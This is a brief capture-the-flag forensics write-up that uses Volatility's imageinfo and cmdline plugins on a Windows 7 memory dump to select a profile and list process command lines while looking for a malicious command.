We're given with the .raw
file.
Based on the challenge instruction, we should find 3 thing from the file.
After analyzing the file, i know that this is a virtual memory file. We can use tools such as volatility
to help us analyzing the memory.
First, we need to find a profile that match with the vile.
python2 volatility/vol.py -f honeypot.raw imageinfo
I use the first profile recommendation, Win7SP1x86_23418
.
We can cmdline
to seeing the process and the command.
python2 volatility/vol.py -f honeypot.raw --profile=Win7SP1x86_23418 cmdline
From there, we can see malicious command that run on the machine with the PID.